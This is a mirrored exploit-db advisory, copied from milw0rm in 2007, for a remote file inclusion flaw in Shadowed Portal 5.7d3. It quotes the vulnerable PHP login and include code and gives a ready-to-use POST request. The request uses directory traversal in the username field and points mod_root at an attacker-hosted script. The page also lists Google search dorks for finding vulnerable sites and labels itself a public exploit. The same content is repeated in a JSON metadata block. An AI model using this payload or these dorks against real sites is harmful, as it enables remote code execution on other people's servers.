Search...

Shadowed Portal <= 5.7d3 POST Remote File Inclusion Vulnerability

2007-12-21T00:00:00

ID EDB-ID:4769
Type exploitdb
Reporter The:Paradox
Modified 2007-12-21T00:00:00

Description

Shadowed Portal <= 5.7d3 (POST) Remote File Inclusion Vulnerability. Webapps exploit for php platform

                                        
                                             ____            __________         __             ____  __   
/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_ 
 |   |/    \    |  | _(__  &lt;_/ ___\   __\  ______  |   \   __\
 |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  |  
 |___|___|  /\__|  /______  /\___  &gt;__|            |___||__|  
          \/\______|      \/     \/                           
------------------------------------------------------------------------------------------------
This is a Public Exploit. 21/12/2007 (dd-mm-yyyy)
------------------------------------------------------------------------------------------------
Â§ Shadowed Portal 5.7 and maybe lower - Remote File Includes (Require) Vulnerabilities Â§
Vendor:	  http://www.shad0wed.com
Severity: Highest
Author:	  The:Paradox

Visit inj3ct-it.org

Proud to be Italian.
------------------------------------------------------------------------------------------------
Related Codes:

-- control.php; line 1:

&lt;?php

require("config.php");

require("globals.php");

require("functions.php");

require("variables.php");

$return = setvar("return");

if($act == "login") {

$online = 0;

$usr = $_POST['usr'];

$pwd = $_POST['pwd'];

if(file_exists($root."/users/".strtolower($usr).".php")) {

require($root."/users/".strtolower($usr).".php");

}

-- globals.php; line 1:

&lt;?php

define('CHECK',md5("null"));

global $viv;

global $mod;

global $act;

global $do;

global $act;

global $id;

global $tp;

global $w;

global $method;

global $board;

global $user;

global $pass;

global $cat;

global $linkback;

global $HTTP_POST_VARS;

global $_GET;

global $_POST;

global $_FILES;

global $HTTP_REFERER;

global $_SERVER;

-- /modules/fs/mod.php; line 1:

&lt;?php

if(!defined('CHECK')) { exit; }
require($mod_root."/config.php");

------------------------------------------------------------------------------------------------
Bug Explanation: 

This Portal presents a vulnerability in the "login system" that allows us to require a page ".php" in the directory "/users/" (whatever using directory transversal ("../") we can require any page).

Additionally "Check" was defined by the required page globals.php, allowing us to bypass the "security-die" on the top of most php page (see /modules/fs/mod.php; line 1).
If we require "/modules/fs/mod.php" with a $mod_root value, we can require an external page of the site.

We can do Post Request to control.php?act=login with post values: usr=../modules/fs/mod&pwd=casualpass&mod_root=http://yoursite.org/yourscript? and get RFI.

------------------------------------------------------------------------------------------------
The require in control.php is extremely unsafe, it could be used with other pages to obtain other vulnerabilities.
------------------------------------------------------------------------------------------------
Google Dork-&gt; Powered by Shadowed Portal
Google Dork-&gt; These script's code is Copyright 2003-2006 by Shadowed Works.
------------------------------------------------------------------------------------------------
Use this exploit at your own risk. You are responsible for your own deeds.
------------------------------------------------------------------------------------------------
Use your brain, do not lame. Enjoy. =)

# milw0rm.com [2007-12-21]

JSON Vulners Source

Initial Source

{"id": "EDB-ID:4769", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Shadowed Portal <= 5.7d3 POST Remote File Inclusion Vulnerability", "description": "Shadowed Portal <= 5.7d3 (POST) Remote File Inclusion Vulnerability. Webapps exploit for php platform", "published": "2007-12-21T00:00:00", "modified": "2007-12-21T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/4769/", "reporter": "The:Paradox", "references": [], "cvelist": [], "lastseen": "2016-01-31T21:44:09", "viewCount": 5, "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2016-01-31T21:44:09", "rev": 2}, "dependencies": {"references": [], "modified": "2016-01-31T21:44:09", "rev": 2}, "vulnersScore": -0.2}, "sourceHref": "https://www.exploit-db.com/download/4769/", "sourceData": " ____ __________ __ ____ __ \n/_ | ____ |__\\_____ \\ _____/ |_ /_ |/ |_ \n | |/ \\ | | _(__ <_/ ___\\ __\\ ______ | \\ __\\\n | | | \\ | |/ \\ \\___| | /_____/ | || | \n |___|___| /\\__| /______ /\\___ >__| |___||__| \n \\/\\______| \\/ \\/ \n------------------------------------------------------------------------------------------------\nThis is a Public Exploit. 21/12/2007 (dd-mm-yyyy)\n------------------------------------------------------------------------------------------------\n\u00c2\u00a7 Shadowed Portal 5.7 and maybe lower - Remote File Includes (Require) Vulnerabilities \u00c2\u00a7\nVendor:\t http://www.shad0wed.com\nSeverity: Highest\nAuthor:\t The:Paradox\n\nVisit inj3ct-it.org\n\nProud to be Italian.\n------------------------------------------------------------------------------------------------\nRelated Codes:\n\n-- control.php; line 1:\n\n<?php\n\nrequire(\"config.php\");\n\nrequire(\"globals.php\");\n\nrequire(\"functions.php\");\n\nrequire(\"variables.php\");\n\n$return = setvar(\"return\");\n\nif($act == \"login\") {\n\n$online = 0;\n\n$usr = $_POST['usr'];\n\n$pwd = $_POST['pwd'];\n\nif(file_exists($root.\"/users/\".strtolower($usr).\".php\")) {\n\nrequire($root.\"/users/\".strtolower($usr).\".php\");\n\n}\n\n-- globals.php; line 1:\n\n<?php\n\ndefine('CHECK',md5(\"null\"));\n\nglobal $viv;\n\nglobal $mod;\n\nglobal $act;\n\nglobal $do;\n\nglobal $act;\n\nglobal $id;\n\nglobal $tp;\n\nglobal $w;\n\nglobal $method;\n\nglobal $board;\n\nglobal $user;\n\nglobal $pass;\n\nglobal $cat;\n\nglobal $linkback;\n\nglobal $HTTP_POST_VARS;\n\nglobal $_GET;\n\nglobal $_POST;\n\nglobal $_FILES;\n\nglobal $HTTP_REFERER;\n\nglobal $_SERVER;\n\n-- /modules/fs/mod.php; line 1:\n\n<?php\n\nif(!defined('CHECK')) { exit; }\nrequire($mod_root.\"/config.php\");\n\n------------------------------------------------------------------------------------------------\nBug Explanation: \n\nThis Portal presents a vulnerability in the \"login system\" that allows us to require a page \".php\" in the directory \"/users/\" (whatever using directory transversal (\"../\") we can require any page).\n\nAdditionally \"Check\" was defined by the required page globals.php, allowing us to bypass the \"security-die\" on the top of most php page (see /modules/fs/mod.php; line 1).\nIf we require \"/modules/fs/mod.php\" with a $mod_root value, we can require an external page of the site.\n\nWe can do Post Request to control.php?act=login with post values: usr=../modules/fs/mod&pwd=casualpass&mod_root=http://yoursite.org/yourscript? and get RFI.\n\n------------------------------------------------------------------------------------------------\nThe require in control.php is extremely unsafe, it could be used with other pages to obtain other vulnerabilities.\n------------------------------------------------------------------------------------------------\nGoogle Dork-> Powered by Shadowed Portal\nGoogle Dork-> These script's code is Copyright 2003-2006 by Shadowed Works.\n------------------------------------------------------------------------------------------------\nUse this exploit at your own risk. You are responsible for your own deeds.\n------------------------------------------------------------------------------------------------\nUse your brain, do not lame. Enjoy. =)\n\n# milw0rm.com [2007-12-21]\n", "osvdbidlist": ["42666"]}

Shadowed Portal &lt;= 5.7d3 POST Remote File Inclusion Vulnerability

Description

Shadowed Portal <= 5.7d3 (POST) Remote File Inclusion Vulnerability. Webapps exploit for php platform

Shadowed Portal <= 5.7d3 POST Remote File Inclusion Vulnerability